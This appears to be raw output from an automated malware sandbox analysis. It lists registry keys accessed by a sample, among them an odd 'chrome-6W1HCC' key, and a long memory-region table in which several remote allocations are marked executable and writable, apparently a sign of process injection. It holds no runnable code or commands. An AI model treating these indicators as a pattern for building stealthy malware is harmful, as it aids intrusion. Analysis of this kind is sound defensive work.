{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\330B1
|
330B1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\chrome-6W1HCC
|
exepath
|
||
|
HKEY_CURRENT_USER\Software\chrome-6W1HCC
|
licence
|
||
|
HKEY_CURRENT_USER\Software\chrome-6W1HCC
|
time
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 69 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8F5000
|
heap
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
125FF000
|
trusted library allocation
|
page read and write
|
|
|
|
2660000
|
trusted library allocation
|
page read and write
|
|
|
|
22EF000
|
trusted library allocation
|
page read and write
|
|
|
|
835000
|
heap
|
page read and write
|
|
|
|
122B8000
|
trusted library allocation
|
page read and write
|
||
|
3263000
|
trusted library allocation
|
page read and write
|
||
|
123A0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A26000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F67000
|
direct allocation
|
page read and write
|
||
|
3A6A000
|
heap
|
page read and write
|
||
|
2BBC000
|
heap
|
page read and write
|
||
|
4825000
|
heap
|
page read and write
|
||
|
2350000
|
heap
|
page execute and read and write
|
||
|
3A67000
|
heap
|
page read and write
|
||
|
4821000
|
heap
|
page read and write
|
||
|
3142000
|
trusted library allocation
|
page read and write
|
||
|
3A5E000
|
heap
|
page read and write
|
||
|
2BE9000
|
heap
|
page read and write
|
||
|
483C000
|
heap
|
page read and write
|
||
|
7FE89B59000
|
trusted library allocation
|
page read and write
|
||
|
5A4F000
|
heap
|
page read and write
|
||
|
7FE8998B000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A0A000
|
trusted library allocation
|
page read and write
|
||
|
278000
|
heap
|
page read and write
|
||
|
4A7000
|
heap
|
page read and write
|
||
|
7FE8995B000
|
trusted library allocation
|
page read and write
|
||
|
3A77000
|
heap
|
page read and write
|
||
|
30B0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89942000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AF3000
|
trusted library allocation
|
page read and write
|
||
|
2C2A000
|
heap
|
page read and write
|
||
|
3A6A000
|
heap
|
page read and write
|
||
|
220000
|
heap
|
page read and write
|
||
|
7FE89980000
|
trusted library allocation
|
page read and write
|
||
|
2A07000
|
trusted library allocation
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
1C42A000
|
heap
|
page read and write
|
||
|
420000
|
heap
|
page read and write
|
||
|
7FFFFF89000
|
trusted library allocation
|
page execute read
|
||
|
1B94E000
|
stack
|
page read and write | page guard
|
||
|
2A0A000
|
trusted library allocation
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
340000
|
heap
|
page read and write
|
||
|
22AF000
|
stack
|
page read and write
|
||
|
1E07000
|
direct allocation
|
page read and write
|
||
|
7FE89C5D000
|
trusted library allocation
|
page read and write
|
||
|
3A5B000
|
heap
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
1A87E000
|
stack
|
page read and write
|
||
|
482C000
|
heap
|
page read and write
|
||
|
47F8000
|
heap
|
page read and write
|
||
|
122BD000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
1AF7E000
|
stack
|
page read and write
|
||
|
2CA3000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
12D000
|
heap
|
page read and write
|
||
|
483C000
|
heap
|
page read and write
|
||
|
489000
|
heap
|
page read and write
|
||
|
4A2000
|
heap
|
page read and write
|
||
|
417000
|
heap
|
page read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
29F9000
|
trusted library allocation
|
page read and write
|
||
|
3A6B000
|
heap
|
page read and write
|
||
|
48C7000
|
heap
|
page read and write
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
4D9000
|
heap
|
page read and write
|
||
|
1B4C0000
|
heap
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AD03000
|
heap
|
page read and write
|
||
|
514000
|
heap
|
page read and write
|
||
|
24A0000
|
heap
|
page read and write
|
||
|
45B000
|
heap
|
page read and write
|
||
|
3137000
|
trusted library allocation
|
page read and write
|
||
|
4BA000
|
heap
|
page read and write
|
||
|
3A61000
|
heap
|
page read and write
|
||
|
2C07000
|
heap
|
page read and write
|
||
|
3D40000
|
trusted library allocation
|
page read and write
|
||
|
2C9C000
|
heap
|
page read and write
|
||
|
445000
|
heap
|
page read and write
|
||
|
39A8000
|
heap
|
page read and write
|
||
|
123D1000
|
trusted library allocation
|
page read and write
|
||
|
497000
|
heap
|
page read and write
|
||
|
401A000
|
stack
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
487E000
|
heap
|
page read and write
|
||
|
1C06F000
|
stack
|
page read and write
|
||
|
30C0000
|
trusted library allocation
|
page execute
|
||
|
474000
|
remote allocation
|
page execute and read and write
|
||
|
5B8E000
|
heap
|
page read and write
|
||
|
5A20000
|
heap
|
page read and write
|
||
|
3A4E000
|
heap
|
page read and write
|
||
|
7FE89B24000
|
trusted library allocation
|
page read and write
|
||
|
524000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
7FE89B52000
|
trusted library allocation
|
page read and write
|
||
|
122C1000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
5AF4000
|
heap
|
page read and write
|
||
|
2BEB000
|
heap
|
page read and write
|
||
|
423000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
6CF000
|
stack
|
page read and write
|
||
|
3266000
|
trusted library allocation
|
page read and write
|
||
|
4870000
|
heap
|
page read and write
|
||
|
3A90000
|
heap
|
page read and write
|
||
|
465000
|
heap
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
4DC0000
|
trusted library allocation
|
page read and write
|
||
|
3A14000
|
heap
|
page read and write
|
||
|
3A37000
|
heap
|
page read and write
|
||
|
5A8A000
|
heap
|
page read and write
|
||
|
2B0000
|
trusted library allocation
|
page read and write
|
||
|
1B6BD000
|
trusted library section
|
page read and write
|
||
|
3A22000
|
heap
|
page read and write
|
||
|
2C9C000
|
heap
|
page read and write
|
||
|
4A6000
|
heap
|
page read and write
|
||
|
1CE000
|
heap
|
page read and write
|
||
|
5D0000
|
direct allocation
|
page read and write
|
||
|
2AE000
|
heap
|
page read and write
|
||
|
3A79000
|
heap
|
page read and write
|
||
|
7FE89C50000
|
trusted library allocation
|
page read and write
|
||
|
1CCBF000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
5A5B000
|
heap
|
page read and write
|
||
|
35C000
|
heap
|
page read and write
|
||
|
7FE89AF3000
|
trusted library allocation
|
page read and write
|
||
|
373000
|
direct allocation
|
page read and write
|
||
|
3080000
|
trusted library allocation
|
page read and write
|
||
|
2BF9000
|
heap
|
page read and write
|
||
|
1C075000
|
heap
|
page read and write
|
||
|
660000
|
heap
|
page read and write
|
||
|
5B3000
|
direct allocation
|
page read and write
|
||
|
4892000
|
heap
|
page read and write
|
||
|
7FE8999C000
|
trusted library allocation
|
page execute and read and write
|
||
|
4889000
|
heap
|
page read and write
|
||
|
1AA80000
|
heap
|
page read and write
|
||
|
27AF000
|
stack
|
page read and write
|
||
|
3A14000
|
heap
|
page read and write
|
||
|
396000
|
heap
|
page read and write
|
||
|
4833000
|
heap
|
page read and write
|
||
|
7FE89A26000
|
trusted library allocation
|
page execute and read and write
|
||
|
3A48000
|
heap
|
page read and write
|
||
|
F0000
|
heap
|
page read and write
|
||
|
412000
|
heap
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
F7000
|
heap
|
page read and write
|
||
|
1CA5C000
|
stack
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BF8000
|
heap
|
page read and write
|
||
|
4846000
|
heap
|
page read and write
|
||
|
492C000
|
heap
|
page read and write
|
||
|
1E07000
|
direct allocation
|
page read and write
|
||
|
492E000
|
heap
|
page read and write
|
||
|
189000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
464000
|
heap
|
page read and write
|
||
|
49D1000
|
heap
|
page read and write
|
||
|
242E000
|
trusted library allocation
|
page read and write
|
||
|
1AD75000
|
heap
|
page read and write
|
||
|
2BE7000
|
heap
|
page read and write
|
||
|
4891000
|
heap
|
page read and write
|
||
|
3142000
|
trusted library allocation
|
page read and write
|
||
|
7FE8994D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5AD1000
|
heap
|
page read and write
|
||
|
481E000
|
heap
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
4A2E000
|
heap
|
page read and write
|
||
|
2A01000
|
trusted library allocation
|
page read and write
|
||
|
4895000
|
heap
|
page read and write
|
||
|
4D7000
|
heap
|
page read and write
|
||
|
486B000
|
heap
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page execute and read and write
|
||
|
329000
|
heap
|
page read and write
|
||
|
469000
|
heap
|
page read and write
|
||
|
429000
|
heap
|
page read and write
|
||
|
1A788000
|
heap
|
page execute and read and write
|
||
|
3258000
|
trusted library allocation
|
page read and write
|
||
|
3143000
|
trusted library allocation
|
page read and write
|
||
|
4CC5000
|
heap
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
29D5000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
126CB000
|
trusted library allocation
|
page read and write
|
||
|
1F8000
|
heap
|
page read and write
|
||
|
4889000
|
heap
|
page read and write
|
||
|
1AB1A000
|
heap
|
page read and write
|
||
|
3A6A000
|
heap
|
page read and write
|
||
|
4A63000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
48A000
|
heap
|
page read and write
|
||
|
8D7000
|
heap
|
page read and write
|
||
|
3261000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
7FE89994000
|
trusted library allocation
|
page read and write
|
||
|
2BF3000
|
heap
|
page read and write
|
||
|
486E000
|
heap
|
page read and write
|
||
|
4821000
|
heap
|
page read and write
|
||
|
413000
|
heap
|
page read and write
|
||
|
483C000
|
heap
|
page read and write
|
||
|
313B000
|
trusted library allocation
|
page read and write
|
||
|
46A000
|
heap
|
page read and write
|
||
|
59FD000
|
heap
|
page read and write
|
||
|
4891000
|
heap
|
page read and write
|
||
|
2F7000
|
heap
|
page read and write
|
||
|
5CD000
|
direct allocation
|
page read and write
|
||
|
4D7000
|
heap
|
page read and write
|
||
|
7FE89BD5000
|
trusted library allocation
|
page read and write
|
||
|
3144000
|
trusted library allocation
|
page read and write
|
||
|
556000
|
heap
|
page read and write
|
||
|
284000
|
heap
|
page read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
2815000
|
heap
|
page read and write
|
||
|
2A03000
|
trusted library allocation
|
page read and write
|
||
|
426000
|
heap
|
page read and write
|
||
|
7FE899F0000
|
trusted library allocation
|
page read and write
|
||
|
29F8000
|
trusted library allocation
|
page read and write
|
||
|
313B000
|
trusted library allocation
|
page read and write
|
||
|
29FE000
|
trusted library allocation
|
page read and write
|
||
|
3310000
|
trusted library allocation
|
page read and write
|
||
|
2271000
|
heap
|
page read and write
|
||
|
1D60000
|
direct allocation
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
2A04000
|
trusted library allocation
|
page read and write
|
||
|
482A000
|
heap
|
page read and write
|
||
|
1A3D0000
|
heap
|
page read and write
|
||
|
3460000
|
trusted library allocation
|
page read and write
|
||
|
7FE89CB6000
|
trusted library allocation
|
page read and write
|
||
|
3AAC000
|
stack
|
page read and write
|
||
|
51A000
|
heap
|
page read and write
|
||
|
4871000
|
heap
|
page read and write
|
||
|
3A6B000
|
heap
|
page read and write
|
||
|
7FE89D10000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
1B81C000
|
stack
|
page read and write
|
||
|
1B1DF000
|
stack
|
page read and write
|
||
|
7FE8995B000
|
trusted library allocation
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
1C524000
|
heap
|
page read and write
|
||
|
7FE89944000
|
trusted library allocation
|
page read and write
|
||
|
47FF000
|
heap
|
page read and write
|
||
|
610000
|
direct allocation
|
page read and write
|
||
|
2660000
|
trusted library allocation
|
page read and write
|
||
|
327D000
|
trusted library allocation
|
page read and write
|
||
|
29D9000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
1A750000
|
heap
|
page execute and read and write
|
||
|
247000
|
heap
|
page read and write
|
||
|
2F7000
|
heap
|
page read and write
|
||
|
47E7000
|
heap
|
page read and write
|
||
|
40B000
|
heap
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
486D000
|
heap
|
page read and write
|
||
|
313D000
|
trusted library allocation
|
page read and write
|
||
|
2E61000
|
trusted library allocation
|
page read and write
|
||
|
1B1D0000
|
heap
|
page read and write
|
||
|
1B96000
|
heap
|
page read and write
|
||
|
485F000
|
heap
|
page read and write
|
||
|
2BE4000
|
heap
|
page read and write
|
||
|
1B825000
|
heap
|
page read and write
|
||
|
1E13000
|
direct allocation
|
page read and write
|
||
|
38B000
|
heap
|
page read and write
|
||
|
5B2F000
|
heap
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
3A63000
|
heap
|
page read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
5992000
|
heap
|
page read and write
|
||
|
5987000
|
heap
|
page read and write
|
||
|
4A30000
|
heap
|
page read and write
|
||
|
478000
|
remote allocation
|
page execute and read and write
|
||
|
125FF000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF87000
|
trusted library allocation
|
page execute read
|
||
|
3BE000
|
heap
|
page read and write
|
||
|
3A72000
|
heap
|
page read and write
|
||
|
1C433000
|
heap
|
page read and write
|
||
|
326A000
|
trusted library allocation
|
page read and write
|
||
|
47D8000
|
heap
|
page read and write
|
||
|
326A000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B16000
|
trusted library allocation
|
page read and write
|
||
|
47FF000
|
heap
|
page read and write
|
||
|
29E2000
|
trusted library allocation
|
page read and write
|
||
|
268000
|
stack
|
page read and write
|
||
|
3A04000
|
heap
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page execute and read and write
|
||
|
3A01000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
15E000
|
heap
|
page read and write
|
||
|
325E000
|
trusted library allocation
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
2F40000
|
heap
|
page read and write
|
||
|
313F000
|
trusted library allocation
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
29DB000
|
trusted library allocation
|
page read and write
|
||
|
36D0000
|
heap
|
page read and write
|
||
|
26D4000
|
heap
|
page read and write
|
||
|
170000
|
heap
|
page read and write
|
||
|
7FE89963000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89C90000
|
trusted library allocation
|
page read and write
|
||
|
3A89000
|
heap
|
page read and write
|
||
|
42F000
|
heap
|
page read and write
|
||
|
4811000
|
heap
|
page read and write
|
||
|
243000
|
stack
|
page read and write
|
||
|
1B77F000
|
stack
|
page read and write
|
||
|
39AC000
|
heap
|
page read and write
|
||
|
5A43000
|
heap
|
page read and write
|
||
|
2CA1000
|
heap
|
page read and write
|
||
|
29FE000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C54000
|
trusted library allocation
|
page read and write
|
||
|
4BD0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89CE0000
|
trusted library allocation
|
page read and write
|
||
|
4C0000
|
heap
|
page read and write
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
426000
|
heap
|
page read and write
|
||
|
2D4000
|
heap
|
page read and write
|
||
|
5B18000
|
heap
|
page read and write
|
||
|
1A9FF000
|
stack
|
page read and write
|
||
|
1A6FF000
|
stack
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
4D3000
|
heap
|
page read and write
|
||
|
47FF000
|
heap
|
page read and write
|
||
|
5A08000
|
heap
|
page read and write
|
||
|
7FE89982000
|
trusted library allocation
|
page read and write
|
||
|
3E5000
|
heap
|
page read and write
|
||
|
7FE8999B000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C07000
|
heap
|
page read and write
|
||
|
3A65000
|
heap
|
page read and write
|
||
|
22E000
|
heap
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
44D000
|
heap
|
page read and write
|
||
|
29E3000
|
trusted library allocation
|
page read and write
|
||
|
450000
|
heap
|
page read and write
|
||
|
3A89000
|
heap
|
page read and write
|
||
|
7FE89974000
|
trusted library allocation
|
page read and write
|
||
|
3A61000
|
heap
|
page read and write
|
||
|
7FE89B2C000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C83000
|
trusted library allocation
|
page read and write
|
||
|
3133000
|
trusted library allocation
|
page read and write
|
||
|
7FE89D00000
|
trusted library allocation
|
page read and write
|
||
|
2C98000
|
heap
|
page read and write
|
||
|
3A14000
|
heap
|
page read and write
|
||
|
32D000
|
heap
|
page read and write
|
||
|
C32000
|
unkown
|
page execute read
|
||
|
3CCA000
|
stack
|
page read and write
|
||
|
7FE89A46000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A05000
|
trusted library allocation
|
page read and write
|
||
|
37F5000
|
trusted library allocation
|
page read and write
|
||
|
3315000
|
trusted library allocation
|
page read and write
|
||
|
29D3000
|
trusted library allocation
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
5AB9000
|
heap
|
page read and write
|
||
|
42E000
|
heap
|
page read and write
|
||
|
5B47000
|
heap
|
page read and write
|
||
|
7FE89C80000
|
trusted library allocation
|
page read and write
|
||
|
3A75000
|
heap
|
page read and write
|
||
|
3A4E000
|
heap
|
page read and write
|
||
|
1A8AF000
|
stack
|
page read and write
|
||
|
486E000
|
heap
|
page read and write
|
||
|
1D20000
|
direct allocation
|
page read and write
|
||
|
3A63000
|
heap
|
page read and write
|
||
|
240000
|
heap
|
page read and write
|
||
|
3A4E000
|
heap
|
page read and write
|
||
|
390000
|
direct allocation
|
page read and write
|
||
|
1C431000
|
heap
|
page read and write
|
||
|
1ADCF000
|
stack
|
page read and write
|
||
|
326A000
|
trusted library allocation
|
page read and write
|
||
|
2C92000
|
heap
|
page read and write
|
||
|
4C34000
|
heap
|
page read and write
|
||
|
1C650000
|
heap
|
page read and write
|
||
|
3A37000
|
heap
|
page read and write
|
||
|
1AD19000
|
heap
|
page read and write
|
||
|
7FE89A00000
|
trusted library allocation
|
page execute and read and write
|
||
|
485000
|
heap
|
page read and write
|
||
|
4826000
|
heap
|
page read and write
|
||
|
427000
|
heap
|
page read and write
|
||
|
47D000
|
heap
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
2C2B000
|
heap
|
page read and write
|
||
|
3A67000
|
heap
|
page read and write
|
||
|
F2000
|
stack
|
page read and write
|
||
|
39E000
|
heap
|
page read and write
|
||
|
3A7B000
|
heap
|
page read and write
|
||
|
1D84000
|
heap
|
page read and write
|
||
|
3A0F000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
6B0000
|
direct allocation
|
page read and write
|
||
|
46F000
|
heap
|
page read and write
|
||
|
7FFFFF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
33D000
|
heap
|
page read and write
|
||
|
1DE0000
|
direct allocation
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
4B8000
|
heap
|
page read and write
|
||
|
7FE89C18000
|
trusted library allocation
|
page read and write
|
||
|
7FE8998D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2230000
|
heap
|
page read and write
|
||
|
47D5000
|
heap
|
page read and write
|
||
|
32E000
|
heap
|
page read and write
|
||
|
42A000
|
heap
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
5AA2000
|
heap
|
page read and write
|
||
|
40B000
|
heap
|
page read and write
|
||
|
3A5E000
|
heap
|
page read and write
|
||
|
426000
|
heap
|
page read and write
|
||
|
1B1CE000
|
stack
|
page read and write
|
||
|
424000
|
heap
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
385000
|
heap
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
1E13000
|
direct allocation
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
47DE000
|
heap
|
page read and write
|
||
|
486E000
|
heap
|
page read and write
|
||
|
7FE89CD0000
|
trusted library allocation
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89D60000
|
trusted library allocation
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
481E000
|
heap
|
page read and write
|
||
|
1C23D000
|
heap
|
page read and write
|
||
|
1C1C3000
|
heap
|
page read and write
|
||
|
313E000
|
trusted library allocation
|
page read and write
|
||
|
1A2E0000
|
trusted library allocation
|
page read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
12865000
|
trusted library allocation
|
page read and write
|
||
|
4A7000
|
heap
|
page read and write
|
||
|
1A758000
|
heap
|
page execute and read and write
|
||
|
1CC0F000
|
stack
|
page read and write
|
||
|
2BEA000
|
heap
|
page read and write
|
||
|
7FE89C60000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF81000
|
trusted library allocation
|
page execute read
|
||
|
1C31C000
|
stack
|
page read and write
|
||
|
3A01000
|
heap
|
page read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
58E000
|
heap
|
page read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
2BF9000
|
heap
|
page read and write
|
||
|
4828000
|
heap
|
page read and write
|
||
|
2B40000
|
trusted library allocation
|
page read and write
|
||
|
426000
|
heap
|
page read and write
|
||
|
326D000
|
trusted library allocation
|
page read and write
|
||
|
2B17000
|
trusted library allocation
|
page read and write
|
||
|
670000
|
direct allocation
|
page read and write
|
||
|
1AA78000
|
stack
|
page read and write
|
||
|
2E7000
|
heap
|
page read and write
|
||
|
2C08000
|
heap
|
page read and write
|
||
|
3B9000
|
heap
|
page read and write
|
||
|
2C26000
|
heap
|
page read and write
|
||
|
4865000
|
heap
|
page read and write
|
||
|
326A000
|
trusted library allocation
|
page read and write
|
||
|
5B3B000
|
heap
|
page read and write
|
||
|
3274000
|
trusted library allocation
|
page read and write
|
||
|
29D1000
|
trusted library allocation
|
page read and write
|
||
|
3135000
|
trusted library allocation
|
page read and write
|
||
|
3258000
|
trusted library allocation
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
42A000
|
heap
|
page read and write
|
||
|
484E000
|
heap
|
page read and write
|
||
|
4865000
|
heap
|
page read and write
|
||
|
721000
|
heap
|
page read and write
|
||
|
4891000
|
heap
|
page read and write
|
||
|
21E0000
|
heap
|
page execute and read and write
|
||
|
47FC000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
1B20000
|
trusted library allocation
|
page read and write
|
||
|
7FE89943000
|
trusted library allocation
|
page execute and read and write
|
||
|
664000
|
heap
|
page read and write
|
||
|
29F5000
|
trusted library allocation
|
page read and write
|
||
|
4818000
|
heap
|
page read and write
|
||
|
3139000
|
trusted library allocation
|
page read and write
|
||
|
48C7000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
5A96000
|
heap
|
page read and write
|
||
|
1C4E3000
|
heap
|
page read and write
|
||
|
1A948000
|
stack
|
page read and write
|
||
|
7FE89B44000
|
trusted library allocation
|
page read and write
|
||
|
2D4000
|
heap
|
page read and write
|
||
|
1B0AF000
|
stack
|
page read and write
|
||
|
2BF4000
|
heap
|
page read and write
|
||
|
300000
|
heap
|
page read and write
|
||
|
7FE89B16000
|
trusted library allocation
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
3E5000
|
heap
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
7FE89964000
|
trusted library allocation
|
page read and write
|
||
|
47F8000
|
heap
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
7FE89960000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B22000
|
trusted library allocation
|
page read and write
|
||
|
3142000
|
trusted library allocation
|
page read and write
|
||
|
7FE89CF0000
|
trusted library allocation
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
481A000
|
heap
|
page read and write
|
||
|
327D000
|
trusted library allocation
|
page read and write
|
||
|
4A9000
|
heap
|
page read and write
|
||
|
4865000
|
heap
|
page read and write
|
||
|
7FE89B44000
|
trusted library allocation
|
page read and write
|
||
|
130000
|
direct allocation
|
page read and write
|
||
|
332E000
|
trusted library allocation
|
page read and write
|
||
|
2C9000
|
heap
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
3CC0000
|
heap
|
page read and write
|
||
|
3B9000
|
heap
|
page read and write
|
||
|
4801000
|
heap
|
page read and write
|
||
|
1C39E000
|
stack
|
page read and write
|
||
|
5A67000
|
heap
|
page read and write
|
||
|
1D80000
|
direct allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3A5B000
|
heap
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
492E000
|
heap
|
page read and write
|
||
|
160000
|
trusted library allocation
|
page read and write
|
||
|
481E000
|
heap
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
1AA89000
|
heap
|
page read and write
|
||
|
4861000
|
heap
|
page read and write
|
||
|
57A000
|
heap
|
page read and write
|
||
|
224E000
|
stack
|
page read and write | page guard
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
483D000
|
heap
|
page read and write
|
||
|
1C4FE000
|
heap
|
page read and write
|
||
|
4815000
|
heap
|
page read and write
|
||
|
2A0C000
|
trusted library allocation
|
page read and write
|
||
|
326D000
|
trusted library allocation
|
page read and write
|
||
|
313B000
|
trusted library allocation
|
page read and write
|
||
|
4CB000
|
heap
|
page read and write
|
||
|
4D9000
|
heap
|
page read and write
|
||
|
1E40000
|
heap
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
5A38000
|
heap
|
page read and write
|
||
|
1C60C000
|
stack
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A10000
|
trusted library allocation
|
page read and write
|
||
|
2B60000
|
trusted library allocation
|
page execute read
|
||
|
2CAA000
|
heap
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
1F67000
|
direct allocation
|
page read and write
|
||
|
4870000
|
heap
|
page read and write
|
||
|
1256D000
|
